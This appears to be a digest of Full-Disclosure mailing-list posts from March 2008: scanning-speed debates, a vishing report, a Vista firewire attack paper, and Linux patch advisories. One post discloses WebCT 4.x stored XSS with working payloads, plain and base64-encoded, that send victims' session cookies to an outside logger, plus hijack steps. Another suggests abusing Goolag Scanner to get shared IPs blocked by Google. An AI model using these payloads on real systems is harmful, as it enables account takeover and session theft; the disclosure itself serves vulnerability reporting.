Re: [Full-disclosure] lets go vishing
On 3/4/08, lsi [EMAIL PROTECTED] wrote: [19:15] lsi2lsi: hiya! ... so i was nearly vished today ... [19:16] lsi2lsi: mobile rings - hello, we're calling from Lloyds TSB, /schnip --from whocallsme.com I have contacted Adeptra (note spelling) to ask them if they are the owners of this number. However, if they have themselves sold the number on to yet another party, I have asked for the details so we can hunt down who is running this scam. Adeptra are based at Forbury Court, 12 Forbury Road, Reading, Berkshire, RG1 1SB Main telephone number is 0118 938 7000 (so I guess Miss Roberts is a direct number (938 7023) at that address). their website is www.adeptra.com have phun mike ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WebCT 4.x Javascript Session Stealer Exploits
WebCT 4.x Javascript Session Stealer Exploits
Software: WebCT Campus Edition 4.x (http://secunia.com/product/3280/)
Affected Version: 4.1.5.8
Discoverer: Benjamin balupton Lupton
Date Discovered: November 2005
Date Reported: 25/06/2007
Software Author Contacted (again) on: 20/07/2007
Date Published: 05/03/2008
Published At:
http://www.balupton.com/blogs/dev?title=webct_session_stealer_exploit
http://www.balupton.com/documents/webct_exploits.txt
Attack Type:
Javascript Session Stealer Exploit.
Description:
Mail Discussion Board messages are not properly checked for javascript,
allowing javascript to perform a session stealing attack (allowing the
attacker to be logged in as the victim).
Tested On:
Attacks were tested fully on eCentral TAFE's WebCT System in November 2005
(with permission of staff),
and again on Curtin University's WebCT System in June 2006 (but this time
only to see if the javascript will run).
Action Taken:
Contacted TAFE lecturers and administrators, who didn't really care.
Contacted WestOne multiple times, but never recieved any response.
Then contacted Secunia, which would not publish as the discoverer did not
own their own copy of the software in question.
Published as WebCT is being phased out, with Blackboard being the
replacement.
Steps:
The attacker publishes the exploit code in a message with Don't wrap text
enabled.
The victim accesses the attacker's message and their cookies are sent to the
attacker's remote logger.
The attacker then logs into the system and replaces his/her cookies with the
acquired cookies.
- Cookies are formatted as follows within the value attribute:
CookieName=CookieValue; NextCookieName=NextCookieValue;
The attacker is now logged into the system as the victim.
In this case the logger is located here:
http://www.balupton.com/sandbox/logger.php?pass_code=secret_key
Notes:
Victims must be students (attack does not work on non students, eg.
teachers/admins).
Attack 2 will also run in Opera, but fails to retrieve the document.cookie
value.
Attack 2 uses a base64 encoded javascript which is executed.
Both attacks can be customized to allow any javascript to run.
Javascript can also be developed to post a mail or discussion board message,
this works for all types of victims.
Resources:
Attack Code: See below
Logger:
http://localhost.balupton.com/sandbox/logger.php?pass_code=secret_keyshow_s
ource=true
Base64 Decoder / Encoder: http://www.balupton.com/sandbox/base64.php
Cookie Editor: Firefox - http://editcookies.mozdev.org/ , Opera - Built In
Attack 1 - IE6SP2 Exploit (Automatic):
div id=mycode style=BACKGROUND: url('java
script:eval(document.all.mycode.expr)') expr=// balupton's javascript
session stealer automatic hack
var iframe = document.createElement('iframe');
iframe.style.border = 'none';
iframe.style.height = '1px';
iframe.style.width = '1px';
var url =
'http'+'://www.balupton.com/sandbox/logger.php'
+'?variable=document.cookie'
+'value='+escape(document.cookie)
+'url='+escape(document.location)
+'pass_code=secret_key'
;
iframe.src = url;
document.body.appendChild(iframe);Thank you/div
Attack 2 - Firefox Exploit (Manual):
a
href=data:text/html;base64,PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KLy8g
YmFsdXB0b24ncyBqYXZhc2NyaXB0IHNlc3Npb24gc3RlYWxlciBtYW51YWwgaGFjaw0KdmFyIHVy
bCA9DQoJJ2h0dHA6Ly93d3cuYmFsdXB0b24uY29tL3NhbmRib3gvbG9nZ2VyLnBocCcNCgkrJz92
YXJpYWJsZT1kb2N1bWVudC5jb29raWUnDQoJKycmdmFsdWU9Jytlc2NhcGUoZG9jdW1lbnQuY29v
a2llKQ0KCSsnJnVybD0nK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlciA/IGRvY3VtZW50LnJlZmVy
cmVyIDogJ2h0dHA6Ly9leHBsb2l0ZWRfdXJsLmNvbScpDQoJKycmcGFzc19jb2RlPXNlY3JldF9r
ZXknDQoJOw0KZG9jdW1lbnQubG9jYXRpb24gPSB1cmw7DQo8L3NjcmlwdD4=Click Me!/a
Attack 2 - Firefox Exploit (Manual) - Decoded:
script type=text/javascript
// balupton's javascript session stealer manual hack
var url =
'http://www.balupton.com/sandbox/logger.php'
+'?variable=document.cookie'
+'value='+escape(document.cookie)
+'url='+escape(document.referrer ? document.referrer :
'http://exploited_url.com')
+'pass_code=secret_key'
;
document.location = url;
/script
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
hey dude, how is merely sending a single datagram not going to be faster than doing an entire handshake? On Tue, Mar 4, 2008 at 12:53 AM, Sebastian Krahmer [EMAIL PROTECTED] wrote: This is not true. I doubt there is any measurable advantage of UDP vs. TCP scans if you do it right. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
dude, you don't need the entire handshake for tcp scanning. On Wed, Mar 5, 2008 at 2:54 PM, Andrew A [EMAIL PROTECTED] wrote: hey dude, how is merely sending a single datagram not going to be faster than doing an entire handshake? On Tue, Mar 4, 2008 at 12:53 AM, Sebastian Krahmer [EMAIL PROTECTED] wrote: This is not true. I doubt there is any measurable advantage of UDP vs. TCP scans if you do it right. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
Hi dude, On Wed, Mar 05, 2008 at 04:54:16AM -0800, Andrew A wrote: hey dude, how is merely sending a single datagram not going to be faster than doing an entire handshake? First, to know whether a TCP port is open you do not need a complete handshake. A single TCP packet is enough. I doubt that a single TCP packet is slower than a single UDP packet. Second you may need to send multiple (same) UDP packets since remote peer's rate limiting does not send you back ICMPs; all due to the unreliable nature of UDP. But the most important thing is, that if you do it large scale*, you have to wait for some sort of reply anyways, either TCP SYN|ACK or some application data. This time of waiting can be used to SYN/request yet another 10,000 hosts. Thus, how fast a scanner is does not depend on UDP or TCP, it depends on the upper protocols. Even complex protocols such as SSH can be spoken very quickly and only require a little more time (if at all) than walking a couple of SNMP OID's per host. 10,000+ hosts/s for a common application TCP protocol such as HTTP is easy. Do not bash me if a UDP app scan takes 10 minutes to succeed and I need 11, we talk about *differences* :-) * speaking about application level which needs some request/responses in both, UDP and TCP, cases regards, Sebastian -- ~ ~ perl self.pl ~ $_='print\$_=\47$_\47;eval';eval ~ [EMAIL PROTECTED] - SuSE Security Team ~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
Hi, all due to the unreliable nature of UDP. But the most important thing is, that if you do it large scale*, you have to wait for some sort of reply anyways, either TCP SYN|ACK or some application data. This time of waiting can be used to SYN/request yet another 10,000 hosts. Thus, how fast a scanner is does not depend on UDP or TCP, it depends on the upper protocols. it mainly depends on the implementation of the scanner. We did some large scale internet SNMP scanning some time ago [see http://www.ernw.de/content/e7/e181/e671/download690/ERNW_026_SNMP_HitB_Dubai_2007_ger.pdf] and used our own scanning tool [http://www.ernw.de/download/snmpattack.pl]. Within the different releases of the tool there were _big_ differences as for the scanning speed. thanks, Enno -- Enno Rey Check out www.troopers08.org! ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902 PGP FP 055F B3F3 FE9D 71DD C0D5 444E C611 033E 3296 1CC1 Handelsregister Heidelberg: HRB 7135 Geschaeftsfuehrer: Roland Fiege, Enno Rey ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Goolag Perk and Annoyance
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Greetings. I preface that this is not a discovery, but rather a simple observation. http://www.goolag.org I am finding that it takes only a few seconds for Google to block query requests, BY IP! With this in mind, Goolag Scanner is actually an effective annoyance tool against large networks. Simply conduct a Goolag Scan from a heavily populated network, with a couple hundred Dorks, and anyone who uses the same public IP address which was used for the Goolag Scan will have to go through an extra CAPTCHA step to finish their Google queries. If they use a Google toolbar of some sort, Google may not even offer them a CAPTCHA option to continue with the search query. Within most corporate networks, what effective methods can be used, from the network's perspective, to block mass Google queries? .te -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkfOskEACgkQVuM8PD1Unspb8QCbBLYgUYKvp7CxnlA3RhLo5ec9 +wAAn35WpzMIvnyaLT4qmho/0O8QbtNN =bYe4 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
That single UDP datagram is definitely faster. Compare the Code Red worm to Sapphire (SQL Slammer), for instance: Previous scanning worms, such as Code Red, spread via many threads, each invoking connect() to probe random addresses. Thus each thread's scanning rate was limited by network latency, the time required to transmit a TCP-SYN packet and wait for a response or timeout. In principal, worms can compensate for this latency by invoking a sufficiently large number of threads. However, in practice, context switch overhead is significant and there are insufficient resources to create enough threads to counteract the network delays -- the worm quickly stalls and becomes latency limited. In contrast, Sapphire's scanner was limited by each compromised machine's bandwidth to the Internet. Since the SQL Server vulnerability was exploitable using a single packet to UDP port 1434, the worm was able to send these scans without requiring a response from the potential victim. * http://www.caida.org/publications/papers/2003/sapphire/sapphire.html (Oops, sorry for the copy to your inbox, Andrew.) On 3/5/08, Andrew A [EMAIL PROTECTED] wrote: hey dude, how is merely sending a single datagram not going to be faster than doing an entire handshake? On Tue, Mar 4, 2008 at 12:53 AM, Sebastian Krahmer [EMAIL PROTECTED] wrote: This is not true. I doubt there is any measurable advantage of UDP vs. TCP scans if you do it right. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firewire Attack on Windows Vista
Hello, In the light of recent discussions about firewire / DMA hacks, we would like to throw in some of the results of our past research on this topic (done mainly by Peter Panholzer) in the form of a short whitepaper. In this paper, we demonstrate that the firewire unlock attack (as implemented in Adam Boileau´s winlockpwn) can be used against Windows Vista. The paper is available at: http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf Best regards, Bernhard -- _ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile+43 676 840301 718 email [EMAIL PROTECTED] Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt Advisor for your information security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
sub ha scritto: Previous scanning worms, such as Code Red, spread via many threads, each invoking connect() to probe random addresses. what the hell is this? visiting the iniquity of the applications upon the protocols? Winsock is probably the only API that lets you connect() asynchronously (via the non-standard ConnectEx extension, but still). And if you have access to raw sockets, the whole point is moot because (IIRC) the advantages of SYN cookies work both ways (Oops, sorry for the copy to your inbox, sub. Blame the mailing list administrators, Thunderbird's clunky UI and my lazyness) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
No, but if you're querying the services for data you do. On 3/5/08, Dmitry [EMAIL PROTECTED] wrote: dude, you don't need the entire handshake for tcp scanning. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2008:058 ] - Updated openldap packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:058 http://www.mandriva.com/security/ ___ Package : openldap Date: March 5, 2008 Affected: 2007.0, 2007.1, 2008.0, Corporate 4.0 ___ Problem Description: A vulnerability was found in slapo-pcache in slapd of OpenLDAP prior to 2.3.39 when running as a proxy-caching server. It would allocate memory using a malloc variant rather than calloc, which prevented an array from being properly initialized and could possibly allow attackers to cause a denial of service (CVE-2007-5708). Two vulnerabilities were found in how slapd handled modify (prior to 2.3.26) and modrdn (prior to 2.3.29) requests with NOOP control on objects stored in the BDB backend. An authenticated user with permission to perform modify (CVE-2007-6698) or modrdn (CVE-2008-0658) operations could cause slapd to crash. The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5708 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6698 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0658 ___ Updated Packages: Mandriva Linux 2007.0: d4427f6f960dceb0a54887395688b02d 2007.0/i586/libldap2.3_0-2.3.27-2.2mdv2007.0.i586.rpm fb96499f3a33a20274b95ae1fe986938 2007.0/i586/libldap2.3_0-devel-2.3.27-2.2mdv2007.0.i586.rpm 0fe0f9a22d5a3d2b8d07170f7e02c360 2007.0/i586/libldap2.3_0-static-devel-2.3.27-2.2mdv2007.0.i586.rpm 248f3a65f570e22b7d1ec67e95a0249e 2007.0/i586/openldap-2.3.27-2.2mdv2007.0.i586.rpm 0ecb5d940de1ec31b1191110d3b40e4e 2007.0/i586/openldap-clients-2.3.27-2.2mdv2007.0.i586.rpm 43170f54bac53b30c6129b07253ab7f6 2007.0/i586/openldap-doc-2.3.27-2.2mdv2007.0.i586.rpm 16a103849faddc8b9e300bd7738b5bde 2007.0/i586/openldap-servers-2.3.27-2.2mdv2007.0.i586.rpm 53476478b042c2e59edf5a2ff330 2007.0/SRPMS/openldap-2.3.27-2.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: eb36e1526f2b3a3a03271edf66d2cca4 2007.0/x86_64/lib64ldap2.3_0-2.3.27-2.2mdv2007.0.x86_64.rpm 6b37c2ee41eb94cb65ec40d551538022 2007.0/x86_64/lib64ldap2.3_0-devel-2.3.27-2.2mdv2007.0.x86_64.rpm 6f009e31ac35621ffa9247501d583ed1 2007.0/x86_64/lib64ldap2.3_0-static-devel-2.3.27-2.2mdv2007.0.x86_64.rpm 445fb7aeb7818f0358659c91fb8ada70 2007.0/x86_64/openldap-2.3.27-2.2mdv2007.0.x86_64.rpm 3cc4725e66a377e07e908f48ee149acb 2007.0/x86_64/openldap-clients-2.3.27-2.2mdv2007.0.x86_64.rpm c5ba86642d7c9e6f3fe51d1201f9596c 2007.0/x86_64/openldap-doc-2.3.27-2.2mdv2007.0.x86_64.rpm 13f4514be8c8f989cc4a1537ec8f8177 2007.0/x86_64/openldap-servers-2.3.27-2.2mdv2007.0.x86_64.rpm 53476478b042c2e59edf5a2ff330 2007.0/SRPMS/openldap-2.3.27-2.2mdv2007.0.src.rpm Mandriva Linux 2007.1: 7cc3081ddcfd3db452d2e90036e3a628 2007.1/i586/libldap2.3_0-2.3.34-5.2mdv2007.1.i586.rpm fbc6f5333b7ca7796d95e8a3718f164a 2007.1/i586/libldap2.3_0-devel-2.3.34-5.2mdv2007.1.i586.rpm e7d258fa40a2a5c52314c856b3bc4fc1 2007.1/i586/libldap2.3_0-static-devel-2.3.34-5.2mdv2007.1.i586.rpm 589ef40a1af243f7664965fe090f7de2 2007.1/i586/openldap-2.3.34-5.2mdv2007.1.i586.rpm ce64d22f74a555746a408d86ab5c24cb 2007.1/i586/openldap-clients-2.3.34-5.2mdv2007.1.i586.rpm 35e5939274493799d93f2eca1388420a 2007.1/i586/openldap-doc-2.3.34-5.2mdv2007.1.i586.rpm 4dd84314508659366aaf95027f37896d 2007.1/i586/openldap-servers-2.3.34-5.2mdv2007.1.i586.rpm 1117b03409884c7799a1f7fd4ac29725 2007.1/i586/openldap-testprogs-2.3.34-5.2mdv2007.1.i586.rpm 67f80a1770d45f7e7e294bd8ec92846e 2007.1/i586/openldap-tests-2.3.34-5.2mdv2007.1.i586.rpm a686ce5b015b7accd63d327a0f898d84 2007.1/SRPMS/openldap-2.3.34-5.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: d47695976ba1bb63169509da41e57e07 2007.1/x86_64/lib64ldap2.3_0-2.3.34-5.2mdv2007.1.x86_64.rpm e6223017fb3b35792e680db1203aca6c 2007.1/x86_64/lib64ldap2.3_0-devel-2.3.34-5.2mdv2007.1.x86_64.rpm 320f8173708590828f70b4995d8ef2a8 2007.1/x86_64/lib64ldap2.3_0-static-devel-2.3.34-5.2mdv2007.1.x86_64.rpm 3b008b7ed26ea10234a13289e84f9388 2007.1/x86_64/openldap-2.3.34-5.2mdv2007.1.x86_64.rpm c158c817b74e2c1e678e8d34fef24a0e 2007.1/x86_64/openldap-clients-2.3.34-5.2mdv2007.1.x86_64.rpm 7b457f83f95361b82e3340cdbc5dcff1 2007.1/x86_64/openldap-doc-2.3.34-5.2mdv2007.1.x86_64.rpm fde2e695d34441ae77714de0fb42d1ba 2007.1/x86_64/openldap-servers-2.3.34-5.2mdv2007.1.x86_64.rpm 96715702c27b99497c5ec7aa917fb586 2007.1/x86_64/openldap-testprogs-2.3.34-5.2mdv2007.1.x86_64.rpm f55189544f96a7de67af997eae52631b
Re: [Full-disclosure] Firewire Attack on Windows Vista
Dear All, That said the original work on this from metlstorm is in the news [1] and can be found here : http://storm.net.nz/projects/16 [1] http://it.slashdot.org/article.pl?sid=08/03/04/1258210from=rss -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ERRATA: [ GLSA 200801-09 ] X.Org X server and Xfont library: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory [ERRATA UPDATE]GLSA 200801-09:03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: X.Org X server and Xfont library: Multiple vulnerabilities Date: January 20, 2008 Updated: March 05, 2008 Bugs: #204362, #208343 ID: 200801-09:03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Errata == The previous version of the X.Org X server (1.3.0.0-r4) did not properly address the integer overflow vulnerability in the MIT-SHM extension (CVE-2007-6429). It failed to check on Pixmaps of certain bit depths. All users of the X.Org X server package should upgrade to x11-base/xorg-server-1.3.0.0-r5. The corrected sections appear below. Affected packages = --- Package / Vulnerable / Unaffected --- 1 x11-base/xorg-server 1.3.0.0-r5 = 1.3.0.0-r5 2 x11-libs/libXfont 1.3.1-r1 = 1.3.1-r1 --- 2 affected packages on all of their supported architectures. --- Resolution == All X.Org X server users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =x11-base/xorg-server-1.3.0.0-r5 All X.Org Xfont library users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =x11-libs/libXfont-1.3.1-r1 References == [ 1 ] CVE-2007-5760 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5760 [ 2 ] CVE-2007-5958 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5958 [ 3 ] CVE-2007-6427 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6427 [ 4 ] CVE-2007-6428 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6428 [ 5 ] CVE-2007-6429 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6429 [ 6 ] CVE-2008-0006 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0006 [ 7 ] X.Org security advisory http://lists.freedesktop.org/archives/xorg/2008-January/031918.html Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200801-09.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200803-10 ] lighttpd: Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: lighttpd: Multiple vulnerabilities Date: March 05, 2008 Bugs: #211230, #211956 ID: 200803-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been discovered in lighttpd. Background == lighttpd is a lightweight high-performance web server. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-servers/lighttpd 1.4.18-r2= 1.4.18-r2 Description === lighttpd contains a calculation error when allocating the global file descriptor array (CVE-2008-0983). Furthermore, it sends the source of a CGI script instead of returning a 500 error (Internal Server Error) when the fork() system call fails (CVE-2008-). Impact == A remote attacker could exploit these vulnerabilities to cause a Denial of Service or gain the source of a CGI script. Workaround == There is no known workaround at this time. Resolution == All lighttpd users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =www-servers/lighttpd-1.4.18-r2 References == [ 1 ] CVE-2008-0983 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0983 [ 2 ] CVE-2008- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008- Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzxPMuhJ+ozIKI5gRAungAJwINfZC2FZ4iEIxlamiBUjwmlflUgCfXXCM LORr9FwlLB0pZuIR6aJJFGE= =uoUo -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-583-1] Evolution vulnerability
=== Ubuntu Security Notice USN-583-1 March 05, 2008 evolution vulnerability CVE-2008-0072 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: evolution 2.6.1-0ubuntu7.2 Ubuntu 6.10: evolution 2.8.1-0ubuntu4.2 Ubuntu 7.04: evolution 2.10.1-0ubuntu2.1 Ubuntu 7.10: evolution 2.12.1-0ubuntu1.1 After a standard system upgrade you need to restart Evolution to effect the necessary changes. Details follow: Ulf Harnhammar discovered that Evolution did not correctly handle format strings when processing encrypted emails. A remote attacker could exploit this by sending a specially crafted email, resulting in arbitrary code execution. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1-0ubuntu7.2.diff.gz Size/MD5: 203646 3015e8026cd5a91df8cb673c5fc39d40 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1-0ubuntu7.2.dsc Size/MD5: 1402 0a32038fe5e071cb4c12935acf639c02 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1.orig.tar.gz Size/MD5: 17037346 e2ba35f5eaa324d0eb552c1c87405042 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.6.1-0ubuntu7.2_amd64.deb Size/MD5: 6578230 ef179b357cb7b454ae8393a366021314 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.6.1-0ubuntu7.2_amd64.deb Size/MD5: 216368 2d6ed392b174e90f21163fcc2163996c http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.6.1-0ubuntu7.2_amd64.deb Size/MD5: 333036 9583853b8fc369d9e991f20d25a92d53 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1-0ubuntu7.2_amd64.deb Size/MD5: 4956256 897c8ff77d8826f2e3c66219c093a7e2 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.6.1-0ubuntu7.2_i386.deb Size/MD5: 5741688 8d351e2a18ffa7de3009dd954b140f61 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.6.1-0ubuntu7.2_i386.deb Size/MD5: 216404 c75bba76d46736190548a063af944501 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.6.1-0ubuntu7.2_i386.deb Size/MD5: 304890 3fa8a69f8fbaffed47da761c0a7ce554 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1-0ubuntu7.2_i386.deb Size/MD5: 4696720 155764faf320f37775cec333b9860a0d powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.6.1-0ubuntu7.2_powerpc.deb Size/MD5: 6513184 d710da9eb147e08928020cee44565b18 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.6.1-0ubuntu7.2_powerpc.deb Size/MD5: 216408 48c0b9b3bd11332e796a3bba406ad990 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.6.1-0ubuntu7.2_powerpc.deb Size/MD5: 348230 8b3f5779fd665287f97f91ed68974571 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1-0ubuntu7.2_powerpc.deb Size/MD5: 4838748 e94f9f1cb37ad60da4e7a9ba71607edb sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dbg_2.6.1-0ubuntu7.2_sparc.deb Size/MD5: 5824958 a1e84f2d584e46c40885b83498bf44a3 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-dev_2.6.1-0ubuntu7.2_sparc.deb Size/MD5: 216442 431edde18d17dcea720845998d07beb8 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution-plugins_2.6.1-0ubuntu7.2_sparc.deb Size/MD5: 304852 6b5b4d337f54af40bd98a57315da5b5b http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.6.1-0ubuntu7.2_sparc.deb Size/MD5: 4781836 6868fc03608119df8aa837556756be84 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.8.1-0ubuntu4.2.diff.gz Size/MD5: 362867 c15866200e4d0b7e0e78895cf8e6fbc0 http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.8.1-0ubuntu4.2.dsc Size/MD5: 1373 f78da23f7ff3d726376659333ed21dee http://security.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_2.8.1.orig.tar.gz Size/MD5: 17782443 0ce38f1ae7992e00eec3414e62cb3a59 amd64 architecture (Athlon64, Opteron, EM64T Xeon):
[Full-disclosure] Multiple vulnerabilities in Perforce Server 2007.3/143793
